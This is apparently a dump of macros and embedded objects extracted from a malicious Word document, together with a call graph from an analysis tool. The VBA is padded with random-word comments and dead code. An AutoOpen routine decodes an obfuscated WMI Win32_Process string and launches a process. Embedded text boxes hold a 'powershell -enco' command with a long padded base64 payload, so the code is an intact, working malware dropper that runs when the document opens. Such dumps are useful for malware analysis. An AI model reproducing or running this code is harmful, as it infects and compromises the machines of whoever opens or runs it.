      'invoice models Cambridgeshire panel UIC-Franc Coordinator EXE Berkshire Credit Card Account South Dakota hacking IB
         Case b530230b0596c
         'generate Steel Causeway HTTP Brand International generate Pakistan Rupee copying
            b7x1b070208 = c08b660x505
            'Designer Rapids parallelism dot-com productize Checking Account online Garden & Kids synthesize Kina Unbranded
            x1770032084 = Atn(c07x07102x08)
            'users invoice Accounts Representative Optimization pink models Indonesia UIC-Franc Gold
         Case xbb77b00329x
         'functionalities Graphical User Interface invoice Aruba GB Money Market Account
            c0c19x9b45x00 = x0001b10x029b
            'Borders incremental Awesome New Jersey Developer Gorgeous open system Generic Wooden Pants Consultant Directives Borders Denmark Rustic Concrete Sausages Licensed Fresh Bacon
            x006c408000c = b0240c50b776
            'programming Branch strategic evolve International backing up Frozen East Caribbean Dollar Operations cyan Grove Books, Sports & Tools
         Case b5386xccx31
         'action-items Handcrafted Plastic Shirt Cambridgeshire clear-thinking Small cross-platform compressing synthesize Avon turquoise utilisation
            x00306c5b03 = ChrW(c50c07292672)
            'Mongolia Coordinator Utah Zimbabwe Dollar Buckinghamshire Producer
            b49013030b28 = c2504bc920471
            'backing up New Jersey deposit Shoals XML supply-chains Brooks Cloned Russian Federation
      End Select
      'Versatile Ergonomic Wooden Chicken paradigms functionalities Avon Alaska partnerships Shore Frozen Cliffs Music & Books tan haptic
      b3b309x3xc076 = Atn(c174x0x80740b)
      'Home Loan Account Buckinghamshire Alabama Syrian Pound IB Generic Soft Chair real-time Identity Sleek Rubber Shoes Communications bi-directional Applications Directives Turkey
      bb1549c3x180 = Hex(b58c7x1007049)
'scalable program Auto Loan Account Berkshire bandwidth SQL bus website
   'forecast Refined Cotton Gloves Research invoice Berkshire Intelligent Soft Chicken database holistic foreground Rustic Fresh Tuna Unbranded Port ADP
c004604bcx0 = False
'parsing plum Metal Cambridgeshire SMTP Reduced revolutionary sticky
cc09047856348 = "CSS Analyst Georgia circuit cyan Accounts"
'Ameliorated Algeria Toys Steel salmon Auto Loan Account transform Estates applications virtual TCP systems
      x389c2427685 = b06000931bc - x60c030000760
      'transition Djibouti Graphic Interface optimal Seychelles Rupee hacking lime hybrid
      Select Case b210c90c81090
      'Devolved Rial Omani repurpose Concrete Metal auxiliary Practical Cotton Chair Fantastic Savings Account
         Case b60629930c6
         'Refined Soft Bacon visionary Handcrafted holistic Technician Glen Handcrafted wireless
            c03bc00001xx = x0070304b634
            'national card Rubber Flat Idaho next-generation Refined Wooden Computer Hollow Turnpike infrastructure
            c30861c90960 = Atn(c206b353066)
            'Investment Account Web panel Trail whiteboard Dalasi Tasty
         Case b000003x5545x
         'Shoal hack yellow solution deploy infrastructures
            x1xx89806039 = b2b9470b00x3
            'Mississippi synthesizing global Serbia Gorgeous Cotton Shoes indexing
            c7xxb018661 = x105c14013088
            'synthesize SMTP Handmade Soft Keyboard payment Gateway US Dollar Handmade Wooden Hat Phased Way
         Case x2037300028
         'Generic Cotton Ball copy Corporate empower paradigm extensible Developer
            c9663800x20b = ChrW(b22442c4260)
            'multi-tasking 24/365 back-end Tasty Metal Gloves Money Market Account fuchsia Ergonomic PNG withdrawal Total Analyst intangible
            x2cc6xxb5013 = x10b10b395010
            'B2B Strategist connecting cross-platform Optional Distributed
      End Select
      'cyan content Kazakhstan payment Operations Ergonomic Fresh Towels
      bx80b970c4b9 = Atn(bxb45013488)
      'Developer Berkshire Dong Plastic optical Health, Movies & Beauty bluetooth Zimbabwe Dollar Nepalese Rupee bus cross-platform Spain payment
      b922c08x9760b = Hex(c9cc0c14004)
'open-source GB local area network Unbranded transmitting optimize Senior Michigan mobile Corners Fresh revolutionary Frozen
b491104015b07 = Replace(c60xbxxb86403, c6x004870b2x6, "")
   'Switchable deposit Small Granite Chicken Music & Toys Sleek Cotton Salad optical Credit Card Account New Leu forecast Nevada Organic Underpass Forward Garden & Computers
c8002bc9580 = False
'secondary withdrawal Savings Account Unbranded Plastic Bike primary Ethiopian Birr Sleek Borders Organic Kansas Point solid state
cc09047856348 = "background card South Dakota Rustic Rubber Chips Gorgeous Steel Hat Knoll Shoes & Music"
'CSS cross-platform back-end Licensed UIC-Franc integrate Oklahoma Usability Small Metal Chips Operations Checking Account sticky Buckinghamshire Liaison
      cx0109bx50x8 = x490062076b07 - b8040c22x9c1
      'array Dynamic Home productize Garden, Health & Clothing Checking Account
      Select Case c03c10309002
      'Quetzal North Carolina Adaptive payment Fantastic Rubber Chicken Books
         Case bb0c4601x2b0
         'transparent North Carolina bifurcated International THX primary Money Market Account Camp
            c192c109093 = c0x89000000
            'Global Open-architected Intelligent Plastic Salad hardware Sleek Metal Shoes Money Market Account parsing deliver Senior redefine
            b79bx502b625 = Atn(b93c082b2x740)
            'multi-byte deposit View Practical Rubber Gloves deposit calculate GB Borders transparent Administrator
         Case c30568c0980
         'Fantastic Steel Table Profound Senior Fresh Concrete hard drive Gabon Inlet
            c40c7b1c78cc2 = c5880x2c506
            'infomediaries National online Hawaii Concrete Gorgeous Metal Towels Coordinator Illinois Supervisor
            c75003301509 = x8831b012x1
            'Iceland Krona Nebraska gold Sleek Fresh Ball Savings Account Adaptive solutions Rwanda Parks TCP Ohio Games, Toys & Computers vertical
         Case b12cx09401130
         'dynamic Prairie Tools Frozen web-readiness service-desk Throughway Music, Clothing & Outdoors bluetooth Coves invoice
            bx000xx6083c = ChrW(x59050902901)
            'EXE moratorium Forges Idaho transition navigate initiatives Rubber Savings Account calculating
            b4020402c10 = c4697x090555
            'US Dollar Refined Cotton Shoes Minnesota Polarised FTP Officer static virtual Data quantify
      End Select
      'Visionary Grass-roots Mauritius Rupee override Home Marketing navigate Bedfordshire Developer Tasty
      b9cx040x48x11 = Atn(x507406002c)
      'matrix Berkshire Universal scalable contingency Tasty Wooden Salad Generic Wooden Cheese Movies, Toys & Kids Small Steel Shoes Berkshire Tasty Generic Mall
      c06088160c15 = Hex(x0940285x600)
'Consultant Baby & Health repurpose Intelligent Frozen Chair SSL RAM Public-key functionalities Fantastic Cotton Gloves violet
   'online Expanded Paradigm Indonesia Refined Wooden Gloves architect Vatu Squares Small Rubber Bike Cambridgeshire interface
cbc1c8607062 = True
'Progressive model cross-media composite invoice Buckinghamshire multi-tasking Kuwait Small Steel Sausages e-business Focused calculate Diverse generating
cc09047856348 = "Engineer Mali Refined Sleek Berkshire Toys cross-platform haptic grow Wooden Village primary Practical Steel Pizza sensor"
'Fantastic Wooden Salad Enterprise-wide pixel Iranian Rial Nebraska Personal Loan Account Generic Granite Sausages Executive calculating
      x061c763809 = b69b0107x40cb - x630b0009706
      'Yen Kansas sensor Music & Baby reboot Consultant Cambridgeshire Rubber transmit input Personal Loan Account customized
      Select Case b2608c2007b6
      'District Executive HDD Money Market Account payment cultivate
         Case b7xx4bxc502
         'Fiji Greens system-worthy synthesize Markets Awesome Soft Shirt proactive Usability calculate Assistant Nevada
            b06x8918b544 = b9997404c70
            'synergies override turn-key Soft Costa Rica Sleek Concrete Shoes Buckinghamshire Generic Frozen Hat Graphic Interface
            x208689902740 = Atn(bc7850849c97)
            'infrastructure intermediate repurpose Legacy Quality driver AGP Generic B2C explicit Awesome
         Case c0170042000
         'next-generation RSS Avon Bedfordshire backing up Ameliorated Guinea Franc
            b5c20x3000c7 = cb60xb7b2400
            'Forward foreground synthesizing Implemented hack Extension payment neural-net User-centric bricks-and-clicks Cotton Bond Markets Units European Composite Unit (EURCO) azure modular
            x3901610700 = x0xx002612b
            'calculating optical Squares Metical Refined Granite Gloves holistic Handcrafted SQL
         Case c3c05082881
         'iterate Jewelery open system Liaison Avon reinvent Applications Home Loan Account Shoes & Kids transmitting alarm
            b40580603123 = ChrW(x6xx7cx8000)
            'strategize Games & Garden Supervisor Customer engage CFP Franc Avon Port Networked Rwanda Franc Summit
            cx710974089 = x46b0489598
            'Kuwaiti Dinar Incredible Wooden Chicken Australia interface metrics Kwacha Liaison Incredible
      End Select
      'function Small bypassing HDD Baby User-friendly invoice Handcrafted Soft Ball invoice Automated
      x306x830799x = Atn(x92024508c00)
      'global Awesome Rubber Table Handcrafted Steel Shirt 24/365 ivory payment Architect Oman groupware Awesome protocol Sweden Synergistic content
      b4308c61738b2 = Hex(b0b3030103cc)
'Incredible Soft Cheese Ouguiya bifurcated Designer South Dakota Money Market Account Investment Account
End Function
Sub autoopen()
   'Home grey Pennsylvania Corporate Station Washington
b077225032x07 = False
'maroon Vision-oriented FTP JBOD Human Extension visualize program task-force Landing Fresh Awesome blue Mongolia
cc09047856348 = "COM Handmade Dominican Peso back-end transparent capacitor connect"
'Gorgeous backing up Facilitator Associate SMTP innovative
      cxc07000c0882 = x64557691b0 - bc1bbc00700b
      'cross-platform monitoring neural open-source Incredible wireless Avon Investor Republic of Korea tan
      Select Case b787c11x64b52
      'payment bus US Dollar Handcrafted Squares Won incubate content quantifying Music, Health & Garden index Awesome Fresh Sausages
         Case c87344x067b
         'mesh content indexing Generic Cotton Sausages Ridges Handcrafted Plastic Tuna harness Legacy Buckinghamshire indexing explicit Incredible Frozen Table North Carolina
            b054b7bb750 = b80x80867b29
            'next generation white zero defect Botswana Self-enabling scale
            b0bxb4049083 = Atn(x3c0bb04x60)
            'communities Assistant Ergonomic Steel Bacon deposit Borders matrix
         Case cx8c8cb8165
         'turquoise service-desk deposit productize Locks Avon niches neural
            bx00321732068 = x07b0313x0x1
            'Northern Mariana Islands partnerships Tools morph PCI back up teal Home Loan Account responsive Licensed Cotton Keyboard
            x09b1805cc8x = c98026840305
            'viral Buckinghamshire Ghana Developer deposit COM digital Personal Loan Account Ergonomic Frozen Towels calculate
         Case cb3b713524418
         'Personal Loan Account contextually-based connecting Rubber parse Sleek Handmade Rubber Bike Senior complexity Dobra Generic Cotton Table National invoice Internal
            b400073bx0b9 = ChrW(bc9517b0751b3)
            'visualize firewall Ethiopia Berkshire Arkansas Triple-buffered Bedfordshire Fresh e-business cyan logistical
            bx0c950c83c = xc56960290407
            'Agent bluetooth navigating Auto Loan Account Data Gorgeous Wooden Pants Clothing Home Loan Account quantifying Home Loan Account Customer-focused Incredible Shoes, Jewelery & Books
      End Select
      'Square bus CFA Franc BEAC Centers 1080p Cotton overriding Handmade Fresh Shirt salmon Graphic Interface Identity
      x701005016044 = Atn(xxbb5509306)
      'mesh Saint Barthelemy Generic CSS Baby turn-key Incredible Fresh Mouse Antarctica (the territory South of 60 deg S) RSS Fantastic
      x52c0c0x708c0 = Hex(c0c6279305c)
'Chief Connecticut Marshall Islands Re-contextualized fuchsia interactive Fantastic Metal Chips cyan Markets multi-byte back-end Bulgarian Lev seize cross-platform
   'Unbranded clear-thinking Auto Loan Account Lesotho expedite virtual Mission neural-net Practical Granite Hat parsing Puerto Rico Harbor Cotton content
ccc900170c080 = True
'gold Creative sensor Visionary circuit River French Guiana Mission Incredible Fresh Chair Human
cc09047856348 = "Future Colorado back-end Grove Bahraini Dinar Unbranded"
'Way maximize transmit Estate pixel Rustic
      c0560630c64 = c0668000980bx - b504c029c24
      'Bedfordshire Ergonomic Wooden Bacon Investment Account Fiji Branding migration Metal content
      Select Case xx15850b83x0
      'grey Home Loan Account generating Awesome Granite Chair Row Gorgeous Concrete Shirt Checking Account syndicate Fresh Buckinghamshire initiatives Handmade Plastic Keyboard
         Case x29505b388xx
         'Surinam Dollar copy models Turks and Caicos Islands architectures Investor mobile neural Metal Cambridgeshire
            x32152695247 = cc051615506
            'Supervisor success encryption XSS Handcrafted Granite Table maroon software
            c464781x3b05 = Atn(x04x3cx650702)
            'Accountability RSS International Hryvnia Mission Terrace THX Fantastic Concrete Table Handmade Cotton Salad Executive generating
         Case c5979730000b
         'input Grocery & Outdoors compelling overriding back up Engineer infrastructure productivity
            xb06707x0c96 = c0040557x0030
            'Kwanza Sleek Rubber Keyboard ivory Persevering paradigms PNG Money Market Account Usability primary Handmade Turks and Caicos Islands
            x5b005972840 = b01c51x0517b4
            'transmit Savings Account Cambridgeshire experiences Field schemas El Salvador Unbranded Plastic Chicken payment Rhode Island clicks-and-mortar expedite virtual
         Case b2x96698654
         'deposit US Dollar Brunei Darussalam application Cambridgeshire even-keeled Practical Granite Chicken transparent wireless reboot redundant
            b05580509c5 = ChrW(x0030x869442)
            'Licensed Cotton Chair Borders transmitting Arkansas fault-tolerant Jamaica functionalities
            c188xc9690c = bb0b6x0200c7
            'Ireland e-tailers empower Common open architecture payment bluetooth Pennsylvania solutions International input
      End Select
      'static Practical Soft Computer blue Unbranded Granite Table Fantastic Granite Shoes Electronics, Computers & Clothing mobile 3rd generation Global
      c93b13079x65 = Atn(c1x146x402012)
      'Zambia Open-source New York back-end Florida Optimization Cambridgeshire Operative driver
      b6x89x0380c = Hex(b07b516600104)
'grow teal Future Granite Avon Cambridgeshire AI COM Burundi Franc Regional Data architect Director Gorgeous
b2c005x3394
   'Iceland Krona Bedfordshire Enterprise-wide Investment Account encoding Tasty paradigms Soft
b051000b24426 = True
'payment internet solution Personal Loan Account yellow Money Market Account Generic Tasty Organic Refined Soft Computer Idaho
cc09047856348 = "Credit Card Account index foreground Agent Agent payment Kansas Awesome Rubber Cheese grey Auto Loan Account"
'Small Cotton Gloves Sleek Fresh Hat Ameliorated Managed Generic Soft Bike invoice Metal leverage
      b5x340b9200 = b9b3c046709 - x91770201300
      'Central functionalities Myanmar Ameliorated Corporate Auto Loan Account Buckinghamshire Unbranded Plastic Shoes Practical Metal Tuna enable
      Select Case b113008972x
      'fault-tolerant redundant Cotton Triple-buffered Cambridgeshire Fresh Direct Home yellow Licensed Plastic Keyboard Clothing Ports
         Case c707220936920
         'invoice Bedfordshire Plastic deposit optical EXE
            x3259902360 = bc06516430776
            'Assurance incremental Savings Account Health hacking Borders firmware Engineer
            c5xb2761x74 = Atn(x5x61b317109c)
            'override experiences Forest Missouri calculating Investment Account AI Bedfordshire Course Small Investment Account Computers, Electronics & Sports auxiliary transmit
         Case b901586068010
         'Technician Senior Investment Account Islands Buckinghamshire Grocery, Tools & Shoes
            cxc8x09x440xb = bc099301720
            'Land deposit Implementation silver Hills Handmade Metal Shirt deliverables
            c30629206580 = b067573294b17
            'Causeway Branding mobile transparent parsing alarm methodical Home Loan Account
         Case b3221cb6494x3
         'initiative Knoll Fresh multi-byte synthesize paradigm Buckinghamshire Principal Tasty Rubber Fish
            x00834b82x17 = ChrW(bbcc00b48753)
            'Saint Martin Communications Refined Plastic Chips Borders Zimbabwe Dollar Malaysian Ringgit
            cb704b13309 = c01x75b08104
            'channels auxiliary payment Function-based RAM Kina
      End Select
      'robust Handmade Rubber Gloves Music, Beauty & Toys Director intermediate hacking silver access
      cb2cxb00151c = Atn(x0156444570)
      'National microchip Industrial Bedfordshire IB Division Ecuador International Coordinator Assistant
      x20975641x0 = Hex(b090050000x3)
'Cambridgeshire Auto Loan Account Yen Fantastic Concrete Chicken Cotton Investment Account array New Hampshire Tools
   'Dynamic driver Legacy synergy eyeballs Money Market Account
x393657c02388 = True
'violet Cliff harness Chief Tasty Handmade Granite Bacon Sleek Rubber Keyboard action-items Regional Idaho Forward bluetooth sensor connect
cc09047856348 = "Barbados synergies data-warehouse white Wooden throughput Zimbabwe Avon Pa'anga global open-source"
'schemas CSS Awesome Rubber Ball orchid olive Multi-lateral paradigms orange Directives Self-enabling
      b2707306033 = bbc04703040 - x90790463b04
      'Generic capacitor next generation Usability Sleek Metal Bike payment Wooden Rubber Vatu International
      Select Case x00x12370b51
      'transmit back up Guarani Brooks moderator Generic Metal Ball Bedfordshire service-desk core
         Case c80901129173
         'Buckinghamshire Strategist neural Direct pink Berkshire AI
            xx4501070487x = cb50b092b53c0
            'programming Gorgeous Steel Ball embrace red blue Internal Personal Loan Account solution Ohio Cloned
            b057509x406b9 = Atn(bc95xcc5904)
            'synthesizing Total sensor mobile Handcrafted Metal Gloves Parks Small auxiliary FTP
         Case c5bx71x0c5x
         'Cambridgeshire wireless HTTP Bedfordshire Jewelery & Electronics Handmade Steel Pants Toys
            xbb6900xcc43x = b98xb4x0966
            'SQL fuchsia Berkshire Land Licensed Concrete Car Solomon Islands HDD JBOD Afghanistan deposit Cambridgeshire Togo
            x1996xxx4115 = c2987905400
            'Cambodia withdrawal protocol withdrawal Supervisor asynchronous focus group model
         Case x13xc6400580
         'relationships pixel framework bottom-line grey Avon IB digital distributed indexing quantify Intelligent Cotton Chair transmitting integrated
            x0657cbc7x00 = ChrW(c0098500x1x0)
            'deposit Kwanza Personal Loan Account User-centric Curve XML framework Mountains Crest Balanced synthesize
            c0x071760348 = b3c190x170c66
            'Syrian Arab Republic IB Borders white Michigan redundant Lari Summit
      End Select
      'Streamlined Coordinator Developer Fords neutral Auto Loan Account Rapids Money Market Account Clothing, Sports & Games connect monitor seamless infomediaries SMTP
      x4877200x37x2 = Atn(bxxb19x01069)
      'artificial intelligence program markets innovate virtual payment program revolutionize
      bx817709x07 = Hex(x0c993b7c65c)
'SAS Iran pixel River Berkshire Profit-focused Checking Account Awesome Cotton Chair out-of-the-box invoice teal Savings Account EXE Bedfordshire
End Sub
VBA Filename b4228986062c0.bas Extracted Macro
Function b2c005x3394()
On Error Resume Next
   'Road invoice Berkshire moderator Virgin Islands, British Direct Savings Account Maine
b81xc200951c = True
'port Future Freeway Chief Park Island Progressive backing up data-warehouse invoice Cambridgeshire Lakes
cc09047856348 = "Awesome Concrete Computer background relationships Garden Dynamic Networked Incredible Soft Chicken Up-sized parsing"
'networks Fresh copying Rhode Island SCSI Malagasy Ariary
      x300312c3049x = b37x50279b7x - c3983bc9991c4
      'Refined Steel Bacon Liberian Dollar Small Frozen Chips calculate synthesizing Future-proofed Consultant Credit Card Account Flat maroon Coordinator 6th generation
      Select Case b420c1c7c20x
      'Technician paradigms Poland Expressway 24 hour Shoes, Jewelery & Books Cliff Armenia
         Case c0102858x80
         'Rustic Concrete Cheese Intelligent Sports, Baby & Baby compressing yellow Gorgeous Rubber Fish Ergonomic value-added Tasty reboot PNG
            b002501b92cc9 = b45b4700x2c80
            'ivory implementation one-to-one Data Product haptic quantify New Caledonia Handmade Granite Tuna transmit copying
            b083593x4x60 = Atn(x07b0b819b19)
            'functionalities Bermudian Dollar (customarily known as Bermuda Dollar) Soft virtual Rustic Metal Sausages viral Metrics Gorgeous Plastic Ball Investor out-of-the-box Japan auxiliary one-to-one
         Case c322c38c53b01
         'Outdoors & Automotive Practical Granite Bacon deposit Applications maximize Planner protocol haptic Borders Parkways Buckinghamshire Village Rapid
            x0805x677c0 = x7b908xx0209
            'Industrial & Automotive Gorgeous Steel Pants instruction set Berkshire Forest killer Re-engineered reboot Frozen indigo firewall Paradigm Bedfordshire
            x10003c917049 = cc2810023172x
            'generating Visionary Generic Berkshire Roads West Virginia Finland Rustic Dynamic
         Case cc8c2473x326
         'Assimilated Texas Handcrafted Rubber Chair Concrete Generic Plastic Fish HTTP Bond Markets Units European Composite Unit (EURCO) Generic Handmade Frozen Bacon analyzer reinvent
            c3062xc6x703 = ChrW(b2xb48080614)
            'Cambridgeshire pixel Roads Practical invoice interfaces Club Bedfordshire scalable applications
            x304605070914 = x20500031c8
            'Practical Rubber Mouse Incredible Steel Hat Licensed Colorado framework Costa Rica
      End Select
      'Borders Generic Metal Table visualize Borders Ergonomic Concrete Chicken Latvia Home Loan Account Steel
      b5200329860 = Atn(c824c256813)
      'internet solution Indiana payment iterate e-tailers application Indiana
      x50920b21c5 = Hex(x0549b39xcb0)
'wireless transmitter plum Unbranded Metal Hat Small Plastic Shirt Centralized Buckinghamshire Multi-lateral XSS Automotive, Music & Movies Bedfordshire white Sleek Facilitator
x86207380b664 = b491104015b07("p" + x7201320x00.x430489957x + x7201320x00.b80230b09208) '
   'calculating virtual Afghanistan applications Ergonomic Rubber Ball Branding next-generation South Georgia and the South Sandwich Islands Fantastic SMS Accountability Sleek
xc071945370 = False
'North Carolina French Guiana Sleek Plastic Towels e-services withdrawal Kip Avon Developer secured line Fresh National port engage
cc09047856348 = "Liaison solid state Adaptive Skyway bricks-and-clicks Rustic Frozen Shirt Advanced green"
'Metal Forward port Iowa unleash panel
      cc42c0609320 = x500130104827 - x04173b2158c
      'Spurs Metal Iowa Oklahoma Reactive Shoes, Computers & Baby
      Select Case c976b2x69918
      'fuchsia quantify Corporate deposit synthesize maroon Guinea-Bissau Web Kwanza purple zero tolerance Sharable Applications
         Case x804137700b
         'Cambridgeshire e-commerce Small Granite Soap deploy Savings Account parsing Web integrate
            x756c89b8x0 = b7x8x000277
            'e-enable Home & Movies cross-media Arkansas channels Personal Loan Account Investment Account Tanzanian Shilling panel Cayman Islands Chief
            c020049c002cx = Atn(x37b0c90610c6)
            'Analyst Analyst teal Proactive Savings Account Circles Cove
         Case c021090013000
         'Kentucky homogeneous Berkshire mint green calculating Maryland background SSL Costa Rica
            b00x90x640c09 = x10004001b2
            'Executive engineer Refined Berkshire synthesizing Massachusetts Borders Planner fresh-thinking TCP Lithuanian Litas transmitter withdrawal Data
            cb3029902660 = c580c11b600
            'Research interface Nakfa Incredible input Managed
         Case bb8055802428
         'Liaison Michigan Investment Account green bandwidth indexing
            xx94x0cx472c2 = ChrW(b4x63c877b535)
            'target Liberia incubate Soft International scale Clothing Monitored invoice
            bbc30x06001 = x7216c9x1c797
            'Florida Canyon Virginia challenge asynchronous District
      End Select
      'directional 3rd generation lime Ways plum Mount process improvement
      x7885421x01 = Atn(c10c806002030)
      'navigating Ridge Intranet bus extranet Division Planner Fantastic
      c6847911c6x = Hex(b2326xc035x70)
'SMS Music Shores Awesome Granite Pizza payment Assurance Legacy bypass SMS Connecticut monitoring Wells Security
x009982c49963 = c74b1x3000000 'monitor Jewelery, Shoes & Shoes Angola withdrawal withdrawal Practical Soft Computer
Set x07608201094 = CreateObject(b491104015b07(b491104015b07(CStr(567066 + 50 - 567066) + "50505050w50inm50505050g50mt50505050s50:W50505050in3250505050_Pr505050oc505050e50505050505050505050ss505050")))
x009982c49963 = x009982c49963 + x07608201094.Create((x86207380b664), c0077498010, x90933c0328, x8c9407c509)
   'pink Checking Account Danish Krone Comoros Lempira Ohio Credit Card Account Station Licensed Soft Pizza bus lavender
x76098295465 = False
'models Metal Intuitive models New Hampshire Profit-focused robust Sleek Granite Fish Fantastic Sharable methodologies Internal Horizontal Personal Loan Account
cc09047856348 = "granular Handcrafted Rubber Chips Licensed Specialist Internal Steel schemas Cambridgeshire copy value-added"
'transmit hard drive attitude navigate Small Wooden Chicken Up-sized Borders Causeway infomediaries transmitter Berkshire
      b0452c1b473b = c014c0346385 - x2261c91600
      'Iraqi Dinar Court incentivize Money Market Account Kentucky Louisiana Program invoice
      Select Case cc0879009cc
      'Music & Outdoors system indexing protocol Peru SMTP well-modulated
         Case bc3x0090xc2
         'focus group XSS North Dakota Grocery, Shoes & Music AI Metal portals Prairie Handcrafted Rubber Tuna Optimized
            c77146673178x = b2bc100705xx
            'Licensed Oregon Central HTTP Canyon Savings Account system distributed Multi-layered
            c08090315970 = Atn(c949bc40xc7)
            'Specialist Research Ergonomic Wooden Gloves synergies Plastic monitor Investment Account Trail
         Case x9046714200
         'Dale France secondary primary Gorgeous deposit intranet Course invoice Vista Investment Account
            x10365108cb20 = x062902692bc6
            'Home Loan Account Refined Frozen Ball superstructure Gibraltar Architect Ergonomic Frozen Chicken Rustic Plastic Car
            c7320c097b02 = cc89113468x0
            'Baby, Tools & Clothing Street Checking Account Trinidad and Tobago Dollar Bedfordshire Designer Future transition San Marino
         Case x529cx35070
         'ivory value-added navigating enable Facilitator Ports Kazakhstan solid state deposit bleeding-edge
            x010700xc55 = ChrW(x4b820508c0b)
            'Uzbekistan Sum haptic Bedfordshire Awesome Steel Table Falkland Islands Pound virtual primary dynamic CSS
            x11x040b530 = cb0004090413x
            'Manors Refined Plastic Pizza firewall matrix Georgia Bahamas Incredible Assistant
      End Select
      'New York gold Sleek mint green SSL payment Green capability Manager parse Generic Granite Tuna backing up XML
      b04058900580 = Atn(c0000899c09)
      'monitor Multi-channelled Awesome overriding Technician deliver
      x0080b769000 = Hex(xx6c5460836)
'deposit Analyst JBOD morph PCI Refined Alabama Personal Loan Account Awesome Frozen Chair
End Function

Vba2Graph

%3 x90933c0328 x90933c0328 ChrW[6] , .Show[1] , Int[2] , Hex[6] , CreateObject[1] , Chr[1] b491104015b07 b491104015b07 ChrW[8] , Int[2] , Hex[8] , Replace[1] x90933c0328->b491104015b07 autoopen autoopen ChrW[4] , Hex[4] b2c005x3394 b2c005x3394 ChrW[3] , Int[1] , Hex[3] , CreateObject[1] , .Create[1] , CStr[1] autoopen->b2c005x3394 b2c005x3394->x90933c0328 b2c005x3394->b491104015b07 x3
JExif
b0c201019x10xb99176785080cc48047046210
ontextualized
d Becker
Erdman
Calibri
Microsoft Forms 2.0 TextBox
Embedded Object
Forms.TextBox.1
c30c84637030
Calibri
Microsoft Forms 2.0 TextBox
Embedded Object
Forms.TextBox.1
50o50w50e50r50s50h50e50l50l50 50-50e50n50c50o50
Calibri
Microsoft Forms 2.0 TextBox
Embedded Object
Forms.TextBox.1
bc05060x8c8o
Calibri
Microsoft Forms 2.0 TextBox
Embedded Object
Forms.TextBox.1
Microsoft Forms 2.0 TextBox
Embedded Object
Forms.TextBox.1
P50A50A50j50A50C50A50A50a50A50B50050A50H50Q50A50c50A50B50z50A50D50o50A50L50w50A50v50A50H50c50A50d50w50B50350A50C50450A50b50Q50B50p50A50G50M50A50c50g50B50v50A50H50M50A50b50w50B50m50A50H50Q50A50L50g50B50j50A50G50850A50b50Q50A50v50A50C50A50A50I50w50A50+50A50C50A50A50J50A50B50450A50D50E50A50Y50g50A50z50A50H50g50A50M50Q50A50350A50D50k50A50N50g50B50j50A50D50M50A50P50Q50A50n50A50H50g50A50Y50w50A50y50A50D50c50A50N50Q50A50y50A50D50E50A50N50Q50A50w50A50D50c50A50N50Q50A50w50A50D50A50A50J50w50A50750A50C50Q50A50e50A50A50450A50D50A50A50O50A50B50450A50D50A50A50O50Q50A50w50A50H50g50A50Y50w50A50w50A50G50M50A50Y50w50A50g50A50D50050A50I50A50A50n50A50D50g50A50N50Q50A50y50A50C50c50A50O50w50A50k50A50G50M50A50N50Q50B50j50A50D50g50A50N50w50A50w50A50D50g50A50Y50g50A50450A50D50c50A50N50g50A50450A50D50050A50J50w50B50i50A50D50g50A50M50A50A50w50A50D50Y50A50M50A50A50w50A50G50M50A50O50Q50A50w50A50D50Q50A50J50w50A50750A50C50Q50A50Y50g50A50450A50G50I50A50O50A50A50250A50D50g50A50M50w50A50y50A50D50A50A50e50A50A50w50A50G50M50A50e50A50A50950A50C50Q50A50Z50Q50B50u50A50H50Y50A50O50g50B50150A50H50M50A50Z50Q50B50y50A50H50A50A50c50g50B50v50A50G50Y50A50a50Q50B50s50A50G50U50A50K50w50A50n50A50F50w50A50J50w50A50r50A50C50Q50A50e50A50A50450A50D50A50A50O50A50B50450A50D50A50A50O50Q50A50w50A50H50g50A50Y50w50A50w50A50G50M50A50Y50w50A50r50A50C50c50A50L50g50B50l50A50H50g50A50Z50Q50A50n50A50D50s50A50J50A50B50i50A50D50g50A50N50Q50A50x50A50D50Q50A50N50g50B50j50A50D50A50A50O50Q50A50x50A50D50I50A50M50Q50A50950A50C50c50A50e50A50A50w50A50D50A50A50O50Q50A50250A50D50Y50A50N50g50B50i50A50D50A50A50M50A50A50w50A50D50I50A50J50w50A50750A50C50Q50A50e50A50A50x50A50D50g50A50M50A50B50450A50D50A50A50N50Q50A50550A50G50M50A50M50w50B50j50A50G50M50A50N50w50A50950A50C50450A50K50A50A50n50A50G50450A50Z50Q50B50350A50C50c50A50K50w50A50n50A50C50050A50b50w50B50i50A50G50o50A50Z50Q50A50n50A50C50s50A50J50w50B50j50A50H50Q50A50J50w50A50p50A50C50A50A50T50g50B50l50A50F50Q50A50L50g50B50X50A50G50U50A50Y50g50B50D50A50G50w50A50S50Q50B50l50A50E50450A50V50A50A50750A50C50Q50A50e50A50B50450A50D50M50A50M50A50A50150A50D50c50A50M50Q50A50350A50D50A50A50O50Q50A50z50A50D50050A50J50w50B50o50A50H50Q50A50d50A50B50w50A50H50M50A50O50g50A50v50A50C50850A50d50w50B50350A50H50c50A50L50g50B50z50A50G50s50A50d50Q50B50s50A50G50w50A50Y50g50B50h50A50G50w50A50a50Q50A50u50A50G50M50A50b50w50B50t50A50C50850A50Y50g50B50r50A50C50450A50d50w50B50w50A50C50050A50Y50w50B50v50A50G50450A50d50A50B50l50A50G50450A50d50A50A50v50A50D50M50A50M50Q50A50x50A50C50850A50Q50A50B50o50A50H50Q50A50d50A50B50w50A50D50o50A50L50w50A50v50A50G50M50A50a50A50B50l50A50G50U50A50b50Q50B50h50A50H50Q50A50c50g50B50h50A50G50450A50c50w50B50450A50H50A50A50c50g50B50l50A50H50M50A50c50w50B50p50A50G50450A50Y50w50A50u50A50G50M50A50b50w50B50t50A50C50850A50d50w50B50w50A50C50050A50a50Q50B50u50A50G50M50A50b50A50B50150A50G50Q50A50Z50Q50B50z50A50C50850A50c50w50B50o50A50G50050A50N50Q50B50k50A50G50o50A50b50A50A50050A50D50Y50A50M50w50A50450A50C50850A50Q50A50B50o50A50H50Q50A50d50A50B50w50A50H50M50A50O50g50A50v50A50C50850A50Y50Q50B50j50A50G50U50A50b50w50B50u50A50H50Q50A50a50A50B50l50A50H50I50A50b50w50B50v50A50G50Y50A50L50g50B50j50A50G50850A50b50Q50A50v50A50G50k50A50M50A50B50v50A50G50450A50a50Q50A50v50A50G50c50A50e50g50B50450A50D50U50A50N50Q50A50150A50D50A50A50L50w50B50A50A50G50g50A50d50A50B50050A50H50A50A50O50g50A50v50A50C50850A50d50w50B50350A50H50c50A50L50g50B50k50A50G50c50A50e50A50B50i50A50H50k50A50Z50A50B50h50A50G50050A50b50w50B50u50A50G50k50A50c50Q50B50150A50G50U50A50L50g50B50j5